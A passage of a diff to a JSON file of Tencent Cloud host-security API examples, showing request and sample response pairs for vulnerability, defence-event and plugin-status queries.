"output": "{\n \"Response\": {\n \"RequestId\": \"354f4ac3-8546-4516-8c8a-69e3ab73aa8a\",\n \"List\": [\n {\n \"Id\": \"1002\",\n \"MachineName\": \"h2-stevenyu\",\n \"MachineIp\": \"10.104.86.62\",\n \"MachineWanIp\": \"132.104.86.62\",\n \"Quuid\": \"6b6cd843-6bc1-4011-a74c-dc3fd26a7dd1\",\n \"MachineRegion\": \"ap-guangzhou\",\n \"MachineType\": \"CVM\"\n }\n ]\n }\n}",
|
2546
2518
|
"title": "获取指定标签关联的服务器信息"
|
2547
2519
|
}
|
2548
2520
|
],
|
@@ -2550,7 +2522,7 @@
|
|
2550
2522
|
{
|
2551
2523
|
"document": "获取所有主机标签",
|
2552
2524
|
"input": "POST / HTTP/1.1\nHost: cwp.tencentcloudapi.com\nContent-Type: application/json\nX-TC-Action: DescribeTags\n<公共请求参数>\n\n{}",
|
2553
|
-
"output": "{\n \"Response\": {\n \"List\": [\n {\n \"Id\": 2,\n \"Name\": \"标签名\",\n \"Count\":
|
2525
|
+
"output": "{\n \"Response\": {\n \"List\": [\n {\n \"Id\": 2,\n \"Name\": \"标签名\",\n \"Count\": \"0\"\n }\n ],\n \"RequestId\": \"b12a5e5a-9393-453f-a4d9-b42de0b2bcec\"\n }\n}",
|
2554
2526
|
"title": "获取所有主机标签"
|
2555
2527
|
}
|
2556
2528
|
],
|
@@ -2558,7 +2530,7 @@
|
|
2558
2530
|
{
|
2559
2531
|
"document": "示例",
|
2560
2532
|
"input": "POST / HTTP/1.1\nHost: cwp.tencentcloudapi.com\nContent-Type: application/json\nX-TC-Action: DescribeTrialReport\n<公共请求参数>\n\n{}",
|
2561
|
-
"output": "{\n \"Response\": {\n \"RequestId\": \"
|
2533
|
+
"output": "{\n \"Response\": {\n \"RequestId\": \"aa3ccfe9-5dc3-40d2-8831-aa99e9a12207\"\n }\n}",
|
2562
2534
|
"title": "示例"
|
2563
2535
|
}
|
2564
2536
|
],
|
@@ -2566,7 +2538,7 @@
|
|
2566
2538
|
{
|
2567
2539
|
"document": "获取指定类型的待处理漏洞数、主机数和非专业版主机数量",
|
2568
2540
|
"input": "https://cwp.tencentcloudapi.com/?Action=DescribeUndoVulCounts\n&VulCategory=2\n&<公共请求参数>",
|
2569
|
-
"output": "{\n \"Response\": {\n \"NotProfessionCount\": 1,\n \"RequestId\": \"req-
|
2541
|
+
"output": "{\n \"Response\": {\n \"NotProfessionCount\": 1,\n \"RequestId\": \"req-561002\",\n \"UndoHostCount\": 1,\n \"UndoVulCount\": 1\n }\n}",
|
2570
2542
|
"title": "获取指定类型的待处理漏洞数、主机数和非专业版主机数量"
|
2571
2543
|
}
|
2572
2544
|
],
|
@@ -2598,23 +2570,23 @@
|
|
2598
2570
|
{
|
2599
2571
|
"document": "",
|
2600
2572
|
"input": "POST / HTTP/1.1\nHost: cwp.tencentcloudapi.com\nContent-Type: application/json\nX-TC-Action: DescribeVersionCompareChart\n<公共请求参数>\n\n{}",
|
2601
|
-
"output": "{\n \"Response\": {\n \"RequestId\": \"bf93077b-51f5-4428-b9de-7e33a0b9cc4a\",\n \"Data\": \"\"\n }\n}",
|
2573
|
+
"output": "{\n \"Response\": {\n \"RequestId\": \"bf93077b-51f5-4428-b9de-7e33a0b9cc4a\",\n \"Data\": \"data-content\"\n }\n}",
|
2602
2574
|
"title": "示例"
|
2603
2575
|
}
|
2604
2576
|
],
|
2605
2577
|
"DescribeVersionStatistics": [
|
2606
2578
|
{
|
2607
2579
|
"document": "统计专业版和基础版机器数",
|
2608
|
-
"input": "https://cwp.tencentcloudapi.com/?Action=DescribeVersionStatistics\n&<公共请求参数>",
|
2609
|
-
"output": "{\n \"Response\": {\n \"BasicVersionNum\": 1,\n \"ProVersionNum\": 1,\n \"RequestId\": \"
|
2580
|
+
"input": "https://cwp.tencentcloudapi.com/?Action=DescribeVersionStatistics\n&<公共请求参数> \n\n{}",
|
2581
|
+
"output": "{\n \"Response\": {\n \"BasicVersionNum\": 1,\n \"ProVersionNum\": 1,\n \"RequestId\": \"935e27b1-d675-4509-80bf-96fbf0764237\",\n \"UltimateVersionNum\": 1,\n \"GeneralVersionNum\": 1\n }\n}",
|
2610
2582
|
"title": "统计专业版和基础版机器数"
|
2611
2583
|
}
|
2612
2584
|
],
|
2613
2585
|
"DescribeVertexDetail": [
|
2614
2586
|
{
|
2615
2587
|
"document": "获取指定点属性信息",
|
2616
|
-
"input": "POST / HTTP/1.1\nHost: cwp.tencentcloudapi.com\nContent-Type: application/json\nX-TC-Action: DescribeVertexDetail\n<公共请求参数>\n\n{\n \"VertexIds\": [\n \"dd8c40c6737f75a0c24244d6f4fa6173\"\n ],\n \"IncidentId\": \"468314cc-4004-492d-a974-7bf5666cb11b\",\n \"TableName\": \"
|
2617
|
-
"output": "{\n \"Response\": {\n \"VertexDetails\": [\n {\n \"Type\": 0,\n \"Time\": \" 2019-12-25 11:57:15\",\n \"AlarmInfo\": [\n {\n \"AlarmId\": \"dd8c40c6\",\n \"Status\": 0\n }\n ],\n \"ProcName\": \"curl\",\n \"CmdLine\": \"curl\",\n \"Pid\": \"2534\",\n \"FileMd5\": \"
|
2588
|
+
"input": "POST / HTTP/1.1\nHost: cwp.tencentcloudapi.com\nContent-Type: application/json\nX-TC-Action: DescribeVertexDetail\n<公共请求参数>\n\n{\n \"VertexIds\": [\n \"dd8c40c6737f75a0c24244d6f4fa6173\"\n ],\n \"IncidentId\": \"468314cc-4004-492d-a974-7bf5666cb11b\",\n \"TableName\": \"incidents_dwewd\"\n}",
|
2589
|
+
"output": "{\n \"Response\": {\n \"VertexDetails\": [\n {\n \"Type\": 0,\n \"Time\": \" 2019-12-25 11:57:15\",\n \"AlarmInfo\": [\n {\n \"AlarmId\": \"dd8c40c6\",\n \"Status\": 0\n }\n ],\n \"ProcName\": \"curl\",\n \"CmdLine\": \"curl\",\n \"Pid\": \"2534\",\n \"FileMd5\": \"472c65af3f43136472d1a383f5******\",\n \"FileContent\": \"njdskhsj\",\n \"FilePath\": \"/var/tmp\",\n \"FileCreateTime\": \"2020-11-21 15:16:00\",\n \"Address\": \"ad1\",\n \"DstPort\": 18888,\n \"SrcIP\": \"10.0.1.92\",\n \"User\": \"root\",\n \"VulName\": \"Apache ActiveMQ远程代码执行漏洞(CVE-2023-46604)\",\n \"VulTime\": \"2020-11-21 15:16:00\",\n \"HttpContent\": \"bodybody\",\n \"VulSrcIP\": \"10.0.1.92\",\n \"VertexId\": \"dd8c40c6737f75a0c24244d6f4fa6173\"\n }\n ],\n \"RequestId\": \"acdd5474-6360-4fd4-bfc7-843162cb8116\"\n }\n}",
|
2618
2590
|
"title": "示例"
|
2619
2591
|
}
|
2620
2592
|
],
|
@@ -2622,7 +2594,7 @@
|
|
2622
2594
|
{
|
2623
2595
|
"document": "漏洞分类统计-批量获取近日指定类型的漏洞数量和主机数量",
|
2624
2596
|
"input": "https://cwp.tencentcloudapi.com/?Action=DescribeVulCountByDates\n&LastDays.0=1\n&VulCategory=1\n&<公共请求参数>",
|
2625
|
-
"output": "{\n \"Response\": {\n \"HostCount\": [\n 0,\n 0,\n 3\n ],\n \"RequestId\": \"req-
|
2597
|
+
"output": "{\n \"Response\": {\n \"HostCount\": [\n 0,\n 0,\n 3\n ],\n \"RequestId\": \"req-1002\",\n \"VulCount\": [\n 0,\n 0,\n 1\n ]\n }\n}",
|
2626
2598
|
"title": "批量获取近日指定类型的漏洞数量和主机数量"
|
2627
2599
|
}
|
2628
2600
|
],
|
@@ -2630,39 +2602,39 @@
|
|
2630
2602
|
{
|
2631
2603
|
"document": "CveId查询漏洞详情",
|
2632
2604
|
"input": "POST / HTTP/1.1\nHost: cwp.tencentcloudapi.com\nContent-Type: application/json\nX-TC-Action: DescribeVulCveIdInfo\n<公共请求参数>\n\n{\n \"CveIds\": [\n \"CVE-2021-31805\"\n ]\n}",
|
2633
|
-
"output": "{\n \"Response\": {\n \"List\": [\n {\n \"FixSwitch\": 1,\n \"VulId\": 1\n }\n ],\n \"RequestId\": \"
|
2605
|
+
"output": "{\n \"Response\": {\n \"List\": [\n {\n \"FixSwitch\": 1,\n \"VulId\": 1\n }\n ],\n \"RequestId\": \"935e27b1-d675-4509-80bf-96fbf0764237\"\n }\n}",
|
2634
2606
|
"title": "CveId查询漏洞详情"
|
2635
2607
|
}
|
2636
2608
|
],
|
2637
2609
|
"DescribeVulDefenceEvent": [
|
2638
2610
|
{
|
2639
2611
|
"document": "",
|
2640
|
-
"input": "POST / HTTP/1.1\nHost: cwp.tencentcloudapi.com\nContent-Type: application/json\nX-TC-Action: DescribeVulDefenceEvent\n<公共请求参数>\n\n{}",
|
2641
|
-
"output": "{\n \"Response\": {\n \"TotalCount\": 1,\n \"List\": [\n {\n \"Id\":
|
2612
|
+
"input": "POST / HTTP/1.1\nHost: cwp.tencentcloudapi.com\nContent-Type: application/json\nX-TC-Action: DescribeVulDefenceEvent\n<公共请求参数>\n\n{\n \"Offset\": 0,\n \"Limit\": 10,\n \"Filters\": []\n}",
|
2613
|
+
"output": "{\n \"Response\": {\n \"RequestId\": \"356fec3f-0a9e-47c1-bbd0-c47d1496d0ae\",\n \"TotalCount\": 1,\n \"List\": [\n {\n \"Id\": 13844,\n \"Uuid\": \"acdd5474-6360-4fd4-bfc7-843162cb8116\",\n \"Quuid\": \"acdd5474-6360-4fd4-bfc7-843162cb8116\",\n \"Alias\": \"v_llzlu微隔离测试(millionlan)\",\n \"PrivateIp\": \"10.0.1.233\",\n \"PublicIp\": \"43.138.142.208\",\n \"UpgradeType\": 1,\n \"VulId\": 14004,\n \"VulName\": \"ISC BIND 资源管理错误漏洞(CVE-2014-8500)\",\n \"CveId\": \"CVE-2014-8500\",\n \"FixType\": 1,\n \"EventType\": 2,\n \"SourceIp\": \"na\",\n \"City\": \"beijing\",\n \"SourcePort\": [],\n \"CreateTime\": \"2024-11-03 00:40:12\",\n \"MergeTime\": \"2024-11-03 15:45:16\",\n \"Count\": 74,\n \"Status\": 1,\n \"MachineExtraInfo\": {\n \"WanIP\": \"43.138.142.208\",\n \"PrivateIP\": \"10.0.1.233\",\n \"NetworkType\": 1,\n \"NetworkName\": \"vpc-mbgoxtov\",\n \"InstanceID\": \"ins-j7vumfb6\",\n \"HostName\": \"v_llzlu微隔离测试(millionlan)\"\n }\n }\n ]\n }\n}",
|
2642
2614
|
"title": "获取漏洞防御事件列表"
|
2643
2615
|
}
|
2644
2616
|
],
|
2645
2617
|
"DescribeVulDefenceList": [
|
2646
2618
|
{
|
2647
|
-
"document": "",
|
2619
|
+
"document": "查询漏洞防御列表",
|
2648
2620
|
"input": "POST / HTTP/1.1\nHost: cwp.tencentcloudapi.com\nContent-Type: application/json\nX-TC-Action: DescribeVulDefenceList\n<公共请求参数>\n\n{\n \"By\": \"PublishTime\",\n \"Limit\": \"20\",\n \"Order\": \"desc\",\n \"Filters\": [\n {\n \"Values\": [\n \"CVE-2022-22963\"\n ],\n \"Name\": \"Keywords\",\n \"ExactMatch\": \"false\"\n }\n ],\n \"Offset\": \"0\"\n}",
|
2649
|
-
"output": "{\n \"Response\": {\n \"List\": [\n {\n \"VulName\": \"Spring Cloud Function SpEL表达式注入漏洞 (CVE-2022-22963)\",\n \"Label\": \"远程利用,存在EXP\",\n \"Level\": 4,\n \"CvssScore\": 9.8,\n \"CveId\": \"CVE-2022-22963\",\n \"PublishTime\": \"2022-03-25 00:00:00\"\n }\n ],\n \"RequestId\": \"5eb93566-d6c9-4a07-baba-dc8788f41f19\",\n \"TotalCount\":
|
2650
|
-
"title": "
|
2621
|
+
"output": "{\n \"Response\": {\n \"List\": [\n {\n \"VulName\": \"Spring Cloud Function SpEL表达式注入漏洞 (CVE-2022-22963)\",\n \"Label\": \"远程利用,存在EXP\",\n \"Level\": 4,\n \"CvssScore\": 9.8,\n \"CveId\": \"CVE-2022-22963\",\n \"Status\": 0,\n \"VulId\": 1,\n \"PublishTime\": \"2022-03-25 00:00:00\"\n }\n ],\n \"RequestId\": \"5eb93566-d6c9-4a07-baba-dc8788f41f19\",\n \"TotalCount\": 1\n }\n}",
|
2622
|
+
"title": "查询漏洞防御列表"
|
2651
2623
|
}
|
2652
2624
|
],
|
2653
2625
|
"DescribeVulDefenceOverview": [
|
2654
2626
|
{
|
2655
2627
|
"document": "",
|
2656
2628
|
"input": "POST / HTTP/1.1\nHost: cwp.tencentcloudapi.com\nContent-Type: application/json\nX-TC-Action: DescribeVulDefenceOverview\n<公共请求参数>\n\n{}",
|
2657
|
-
"output": "{\n \"Response\": {\n \"Overview\": {\n \"Enable\":
|
2629
|
+
"output": "{\n \"Response\": {\n \"Overview\": {\n \"Enable\": 1,\n \"DefendHostCount\": 35,\n \"ExceptionCount\": 1,\n \"AttackCounts\": [\n 0,\n 0,\n 20,\n 0,\n 0,\n 0,\n 0,\n 17,\n 11,\n 2,\n 33,\n 49,\n 105,\n 80\n ],\n \"DefendCounts\": [\n 0,\n 0,\n 20,\n 0,\n 0,\n 0,\n 0,\n 17,\n 11,\n 2,\n 33,\n 49,\n 105,\n 80\n ],\n \"Date\": [\n \"2024-10-21\",\n \"2024-10-22\",\n \"2024-10-23\",\n \"2024-10-24\",\n \"2024-10-25\",\n \"2024-10-26\",\n \"2024-10-27\",\n \"2024-10-28\",\n \"2024-10-29\",\n \"2024-10-30\",\n \"2024-10-31\",\n \"2024-11-01\",\n \"2024-11-02\",\n \"2024-11-03\"\n ]\n },\n \"RequestId\": \"29fa069b-b83e-4e88-944f-456de8bfffcd\"\n }\n}",
|
2658
2630
|
"title": "获取漏洞防御概览信息"
|
2659
2631
|
}
|
2660
2632
|
],
|
2661
2633
|
"DescribeVulDefencePluginDetail": [
|
2662
2634
|
{
|
2663
2635
|
"document": "",
|
2664
|
-
"input": "POST / HTTP/1.1\nHost: cwp.tencentcloudapi.com\nContent-Type: application/json\nX-TC-Action: DescribeVulDefencePluginDetail\n<公共请求参数>\n\n{\n \"Quuid\": \"
|
2665
|
-
"output": "{\n \"Response\": {\n \"
|
2636
|
+
"input": "POST / HTTP/1.1\nHost: cwp.tencentcloudapi.com\nContent-Type: application/json\nX-TC-Action: DescribeVulDefencePluginDetail\n<公共请求参数>\n\n{\n \"Offset\": 0,\n \"Limit\": 10,\n \"Quuid\": \"f3076bef-0fdf-44f4-bb63-b5232e13e167\",\n \"Filters\": [\n {\n \"Name\": \"Status\",\n \"Values\": [\n \"1\"\n ],\n \"ExactMatch\": true\n }\n ]\n}",
|
2637
|
+
"output": "{\n \"Response\": {\n \"List\": [\n {\n \"Pid\": 28942,\n \"MainClass\": \"org.apache.catalina.startup.Bootstrap\",\n \"Status\": 1,\n \"ErrorLog\": \"error\",\n \"InjectLog\": \"failed\"\n }\n ],\n \"RequestId\": \"de9c0927-3177-48f5-9212-2c3354a4c011\",\n \"TotalCount\": 1\n }\n}",
|
2666
2638
|
"title": "获取单台主机漏洞防御插件信息"
|
2667
2639
|
}
|
2668
2640
|
],
|
@@ -2677,8 +2649,8 @@
|
|
2677
2649
|
"DescribeVulDefencePluginStatus": [
|
2678
2650
|
{
|
2679
2651
|
"document": "获取各主机漏洞防御插件状态",
|
2680
|
-
"input": "POST / HTTP/1.1\nHost: cwp.tencentcloudapi.com\nContent-Type: application/json\nX-TC-Action: DescribeVulDefencePluginStatus\n<公共请求参数>\n\n{}",
|
2681
|
-
"output": "{\n \"Response\": {\n \"
|
2652
|
+
"input": "POST / HTTP/1.1\nHost: cwp.tencentcloudapi.com\nContent-Type: application/json\nX-TC-Action: DescribeVulDefencePluginStatus\n<公共请求参数>\n\n{\n \"Order\": \"desc\",\n \"By\": \"CreateTime\",\n \"Offset\": 0,\n \"Limit\": 10,\n \"Filters\": [\n {\n \"Name\": \"Exception\",\n \"Values\": [\n \"1\"\n ],\n \"ExactMatch\": false\n }\n ]\n}",
|
2653
|
+
"output": "{\n \"Response\": {\n \"List\": [\n {\n \"Quuid\": \"f3076bef-0fdf-44f4-bb63-b5232e13e167\",\n \"Alias\": \"machinename\",\n \"PrivateIp\": \"10.0.1.2\",\n \"PublicIp\": \"43.139.183.147\",\n \"Exception\": 1,\n \"CreateTime\": \"2024-09-04 10:55:34\",\n \"ModifyTime\": \"2024-11-03 16:26:33\"\n }\n ],\n \"RequestId\": \"1a2eba98-7a6f-4798-9724-d774c5172044\",\n \"TotalCount\": 1\n }\n}",
|
2682
2654
|
"title": "获取各主机漏洞防御插件状态"
|
2683
2655
|
}
|
2684
2656
|
],
|
@@ -2694,7 +2666,7 @@
|
|
2694
2666
|
{
|
2695
2667
|
"document": "漏洞影响主机列表",
|
2696
2668
|
"input": "https://cwp.tencentcloudapi.com/?Action=DescribeVulEffectHostList\n&VulId=100435\n&Limit=10\n&Offset=0\n&<公共请求参数>",
|
2697
|
-
"output": "{\n \"Response\": {\n \"RequestId\": \"4234234\",\n \"TotalCount\": 2,\n \"VulEffectHostList\": [\n {\n \"EventId\": 15,\n \"
|
2669
|
+
"output": "{\n \"Response\": {\n \"RequestId\": \"4234234\",\n \"TotalCount\": 2,\n \"VulEffectHostList\": [\n {\n \"EventId\": 15,\n \"FirstDiscoveryTime\": \"2021-03-24 16:37:57\",\n \"MachineExtraInfo\": {\n \"WanIP\": \"10.0.1****\",\n \"PrivateIP\": \"10.0.1****\",\n \"NetworkType\": 0,\n \"NetworkName\": \"vpc-3gov****\",\n \"InstanceID\": \"lhins-n4sz****\",\n \"HostName\": \"demo_****\"\n },\n \"PublicIpAddresses\": \"1.1.1.1\",\n \"InstanceState\": \"PENDING\",\n \"IsSupportAutoFix\": 2,\n \"HostVersion\": 101,\n \"CloudTags\": [\n {\n \"TagKey\": \"Dev\",\n \"TagValue\": \"cwp\"\n }\n ],\n \"Description\": \"说明信息\",\n \"FixStatusMsg\": \"修复超时\",\n \"Status\": 0,\n \"LastTime\": \"2020-04-22 03:29:52\",\n \"Level\": 1,\n \"Quuid\": \"b86925b4-cc36-420e-80d4-5094cb2f094b\",\n \"Uuid\": \"ed629672-165e-11ea-8bcf-40f2e9f3d932\",\n \"HostIp\": \"10.104.14.165\",\n \"AliasName\": \"poc测试(129.204.36.227)\",\n \"Tags\": [\n \"cwp\"\n ]\n }\n ]\n }\n}",
|
2698
2670
|
"title": "漏洞影响主机列表"
|
2699
2671
|
}
|
2700
2672
|
],
|
@@ -2710,7 +2682,7 @@
|
|
2710
2682
|
{
|
2711
2683
|
"document": "获取漏洞紧急通知信息",
|
2712
2684
|
"input": "https://cwp.tencentcloudapi.com/?Action=DescribeVulEmergentMsg\n&<公共请求参数>",
|
2713
|
-
"output": "{\n \"Response\": {\n \"RequestId\": \"4234234\",\n \"EmergentMsgList\": [\n {\n \"VulId\": 100488,\n \"PublishTime\": \"2020-03-13 00:00:00\",\n \"Name\": \"Windows SMB远程代码执行漏洞\"\n }\n ]\n }\n}",
|
2685
|
+
"output": "{\n \"Response\": {\n \"RequestId\": \"4234234\",\n \"EmergentMsgList\": [\n {\n \"VulId\": 100488,\n \"PublishTime\": \"2020-03-13 00:00:00\",\n \"Name\": \"Windows SMB远程代码执行漏洞\",\n \"NameEn\": \"Windows SMB remote exec\"\n }\n ]\n }\n}",
|
2714
2686
|
"title": "获取漏洞紧急通知信息"
|
2715
2687
|
}
|
2716
2688
|
],
|
@@ -2718,7 +2690,7 @@
|
|
2718
2690
|
{
|
2719
2691
|
"document": "",
|
2720
2692
|
"input": "POST / HTTP/1.1\nHost: cwp.tencentcloudapi.com\nContent-Type: application/json\nX-TC-Action: DescribeVulFixStatus\n<公共请求参数>\n\n{\n \"FixId\": \"1\"\n}",
|
2721
|
-
"output": "{\n \"Response\": {\n \"FixEndTime\": \"2019-12-25 11:57:15\",\n \"SnapshotFailCnt\": 1,\n \"SnapshotList\": [\n {\n \"Status\": 1,\n \"SnapshotName\": \"快照名称\",\n \"HostName\": \"机器名称\",\n \"FailReason\": \"\",\n \"Quuid\": \"05f0bcab-726c-4ea4-8109-bcd03d5598f7\",\n \"ModifyTime\": \"2019-12-25 11:57:15\",\n \"SnapshotId\": \"快照ID\",\n \"HostIp\": \"1.1.1.1\",\n \"Id\": 1\n }\n ],\n \"FixSuccessCnt\": 1,\n \"FixProgress\": 1,\n \"FixStartTime\": \"2019-12-25 11:57:15\",\n \"IsRetrySnapshot\": 1,\n \"RemainingTime\": 1,\n \"IsAllowRetry\": 1,\n \"HostCnt\": 1,\n \"SnapshotProgress\": 1,\n \"FixId\": 1,\n \"FixFailCnt\": 1,\n \"VulFixList\": [\n {\n \"VulName\": \"漏洞名称\",\n \"FixSuccessCnt\": 1,\n \"HostList\": [\n {\n \"Status\": 1,\n \"ModifyTime\": \"2019-12-25 11:57:15\",\n \"HostName\": \"机器名称\",\n \"FailReason\": \"
|
2693
|
+
"output": "{\n \"Response\": {\n \"FixEndTime\": \"2019-12-25 11:57:15\",\n \"SnapshotFailCnt\": 1,\n \"SnapshotList\": [\n {\n \"Status\": 1,\n \"SnapshotName\": \"快照名称\",\n \"HostName\": \"机器名称\",\n \"FailReason\": \"success\",\n \"Quuid\": \"05f0bcab-726c-4ea4-8109-bcd03d5598f7\",\n \"ModifyTime\": \"2019-12-25 11:57:15\",\n \"SnapshotId\": \"快照ID\",\n \"HostIp\": \"1.1.1.1\",\n \"Id\": 1\n }\n ],\n \"FixSuccessCnt\": 1,\n \"FixProgress\": 1,\n \"FixStartTime\": \"2019-12-25 11:57:15\",\n \"IsRetrySnapshot\": 1,\n \"RemainingTime\": 1,\n \"IsAllowRetry\": 1,\n \"HostCnt\": 1,\n \"SnapshotProgress\": 1,\n \"FixId\": 1,\n \"FixFailCnt\": 1,\n \"VulFixList\": [\n {\n \"VulName\": \"漏洞名称\",\n \"FixSuccessCnt\": 1,\n \"HostList\": [\n {\n \"Status\": 1,\n \"ModifyTime\": \"2019-12-25 11:57:15\",\n \"HostName\": \"机器名称\",\n \"FailReason\": \"修复成功\",\n \"Quuid\": \"05f0bcab-726c-4ea4-8109-bcd03d5598f7\",\n \"HostIp\": \"1.1.1.1\"\n }\n ],\n \"FailCnt\": 1,\n \"VulId\": 1,\n \"Progress\": 1\n }\n ],\n \"RequestId\": \"c741a4fd-776f-499b-85a2-7bc70fd5b92s\"\n }\n}",
|
2722
2694
|
"title": "漏洞修护-查找主机漏洞修护进度"
|
2723
2695
|
}
|
2724
2696
|
],
|
@@ -2726,7 +2698,7 @@
|
|
2726
2698
|
{
|
2727
2699
|
"document": "获取待处理漏洞数+影响主机数",
|
2728
2700
|
"input": "POST / HTTP/1.1\nHost: cwp.tencentcloudapi.com\nContent-Type: application/json\nX-TC-Action: DescribeVulHostCountScanTime\n<公共请求参数>\n\n{}",
|
2729
|
-
"output": "{\n \"Response\": {\n \"RequestId\": \"4234234\",\n \"ScanTime\": \"2020-01-01 00:00:00\",\n \"TotalVulCount\": 38,\n \"VulHostCount\": 16,\n \"IfFirstScan\": true,\n \"hadAutoFixVul\": true,\n \"LastFixTime\": \"
|
2701
|
+
"output": "{\n \"Response\": {\n \"RequestId\": \"4234234\",\n \"ScanTime\": \"2020-01-01 00:00:00\",\n \"TotalVulCount\": 38,\n \"VulHostCount\": 16,\n \"IfFirstScan\": true,\n \"hadAutoFixVul\": true,\n \"LastFixTime\": \"2020-11-21 15:16:00\",\n \"TaskId\": 1\n }\n}",
|
2730
2702
|
"title": "获取待处理漏洞数+影响主机数"
|
2731
2703
|
}
|
2732
2704
|
],
|
@@ -2742,7 +2714,7 @@
|
|
2742
2714
|
{
|
2743
2715
|
"document": "漏洞详情,带CVSS版本",
|
2744
2716
|
"input": "POST / HTTP/1.1\nHost: cwp.tencentcloudapi.com\nContent-Type: application/json\nX-TC-Action: DescribeVulInfoCvss\n<公共请求参数>\n\n{\n \"VulId\": \"100441\"\n}",
|
2745
|
-
"output": "{\n \"Response\": {\n \"CveId\": \"1\",\n \"CvssScore\": 1,\n \"Description\": \"ad\",\n \"Reference\": \"fs\",\n \"VulName\": \"漏洞1\",\n \"CveInfo\": \"\",\n \"CvssScoreFloat\": 9.9,\n \"VulType\": 1,\n \"VulLevel\": 2,\n \"RequestId\": \"354f4ac3-8546-4516-8c8a-69e3ab73aa8a\",\n \"VulId\": 100441,\n \"RepairPlan\": \"13412\",\n \"CVSS\": \"AV:L/AC:L/Au:N/C:N/I:P/A:N\",\n \"Labels\": \"tag1,tag2\",\n \"DefenseAttackCount\": 1,\n \"SuccessFixCount\": 1,\n \"FixSwitch\": 0,\n \"PublicDate\": \"2020-12-30:00:00:00\"\n }\n}",
|
2717
|
+
"output": "{\n \"Response\": {\n \"CveId\": \"1\",\n \"CvssScore\": 1,\n \"Description\": \"ad\",\n \"Reference\": \"fs\",\n \"VulName\": \"漏洞1\",\n \"CveInfo\": \"AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\",\n \"CvssScoreFloat\": 9.9,\n \"VulType\": 1,\n \"VulLevel\": 2,\n \"RequestId\": \"354f4ac3-8546-4516-8c8a-69e3ab73aa8a\",\n \"VulId\": 100441,\n \"RepairPlan\": \"13412\",\n \"CVSS\": \"AV:L/AC:L/Au:N/C:N/I:P/A:N\",\n \"Labels\": \"tag1,tag2\",\n \"DefenseAttackCount\": 1,\n \"SuccessFixCount\": 1,\n \"FixSwitch\": 0,\n \"PublicDate\": \"2020-12-30:00:00:00\"\n }\n}",
|
2746
2718
|
"title": "漏洞详情,带CVSS版本"
|
2747
2719
|
}
|
2748
2720
|
],
|
@@ -2750,7 +2722,7 @@
|
|
2750
2722
|
{
|
2751
2723
|
"document": "",
|
2752
2724
|
"input": "POST / HTTP/1.1\nHost: cwp.tencentcloudapi.com\nContent-Type: application/json\nX-TC-Action: DescribeVulLabels\n<公共请求参数>\n\n{}",
|
2753
|
-
"output": "{\n \"Response\": {\n \"RequestId\": \"
|
2725
|
+
"output": "{\n \"Response\": {\n \"RequestId\": \"F00A8503-6233-452E-913E-DAFEE9******\",\n \"List\": [\n \"服务重启\"\n ]\n }\n}",
|
2754
2726
|
"title": "示例"
|
2755
2727
|
}
|
2756
2728
|
],
|
@@ -2758,7 +2730,7 @@
|
|
2758
2730
|
{
|
2759
2731
|
"document": "查询漏洞数量按等级分布统计",
|
2760
2732
|
"input": "POST / HTTP/1.1\nHost: cwp.tencentcloudapi.com\nContent-Type: application/json\nX-TC-Action: DescribeVulLevelCount\n<公共请求参数>\n\n{}",
|
2761
|
-
"output": "{\n \"Response\": {\n \"RequestId\": \"
|
2733
|
+
"output": "{\n \"Response\": {\n \"RequestId\": \"req-1002\",\n \"VulLevelList\": [\n {\n \"VulLevel\": 3,\n \"Count\": 16\n },\n {\n \"VulLevel\": 2,\n \"Count\": 16\n },\n {\n \"VulLevel\": 1,\n \"Count\": 4\n },\n {\n \"VulLevel\": 0,\n \"Count\": 2\n }\n ]\n }\n}",
|
2762
2734
|
"title": "查询漏洞数量按等级分布统计"
|
2763
2735
|
}
|
2764
2736
|
],
|
@@ -2766,7 +2738,7 @@
|
|
2766
2738
|
{
|
2767
2739
|
"document": "获取指定分类和状态的漏洞列表数据",
|
2768
2740
|
"input": "https://cwp.tencentcloudapi.com/?Action=DescribeVulList\n&Limit=10\n&Offset=0\n&<公共请求参数>",
|
2769
|
-
"output": "{\n \"Response\": {\n \"VulInfoList\": [\n {\n \"Ids\": \"1\",\n \"Name\": \"Apache Log4j 1.x JNDI 注入漏洞(CVE-2021-4104)\",\n \"VulId\": 34338,\n \"Status\": 0,\n \"PublishTime\": \"2021-12-14 20:15:00\",\n \"LastTime\": \"2024-10-21 17:20:13\",\n \"HostCount\": 1,\n \"Level\": 3,\n \"From\": 0,\n \"Descript\": \"Apache Log4j是美国阿帕奇(Apache)基金会的一款基于Java的开源日志记录工具。 \\nApache Log4j 1.2存在代码问题漏洞,攻击者可利用该漏洞通过JMSApender反序列化来运行代码。\",\n \"PublishTimeWisteria\": \"\",\n \"NameWisteria\": \"\",\n \"DescriptWisteria\": \"\",\n \"CveId\": \"CVE-2021-4104\",\n \"CvssScore\": 7.5,\n \"Labels\": \"远程利用,存在POC\",\n \"IsSupportDefense\": 0,\n \"FixSwitch\": 1,\n \"TaskId\": 1,\n \"StatusStr\": \"\",\n \"DefenseAttackCount\": 0,\n \"FirstAppearTime\": \"2024-10-18T01:22:06+08:00\",\n \"VulCategory\": 4,\n \"AttackLevel\": 0,\n \"FixNoNeedRestart\": false,\n \"Method\": 0,\n \"VulFixSwitch\": 1\n }\n ],\n \"TotalCount\": 1,\n \"FollowVulCount\": 1,\n \"RequestId\": \"
|
2741
|
+
"output": "{\n \"Response\": {\n \"VulInfoList\": [\n {\n \"Ids\": \"1\",\n \"Name\": \"Apache Log4j 1.x JNDI 注入漏洞(CVE-2021-4104)\",\n \"VulId\": 34338,\n \"Status\": 0,\n \"PublishTime\": \"2021-12-14 20:15:00\",\n \"LastTime\": \"2024-10-21 17:20:13\",\n \"HostCount\": 1,\n \"Level\": 3,\n \"From\": 0,\n \"Descript\": \"Apache Log4j是美国阿帕奇(Apache)基金会的一款基于Java的开源日志记录工具。 \\nApache Log4j 1.2存在代码问题漏洞,攻击者可利用该漏洞通过JMSApender反序列化来运行代码。\",\n \"PublishTimeWisteria\": \"public time wisteria\",\n \"NameWisteria\": \"wisteria name\",\n \"DescriptWisteria\": \"description\",\n \"CveId\": \"CVE-2021-4104\",\n \"CvssScore\": 7.5,\n \"Labels\": \"远程利用,存在POC\",\n \"IsSupportDefense\": 0,\n \"FixSwitch\": 1,\n \"TaskId\": 1,\n \"StatusStr\": \"1\",\n \"DefenseAttackCount\": 0,\n \"FirstAppearTime\": \"2024-10-18T01:22:06+08:00\",\n \"VulCategory\": 4,\n \"AttackLevel\": 0,\n \"FixNoNeedRestart\": false,\n \"Method\": 0,\n 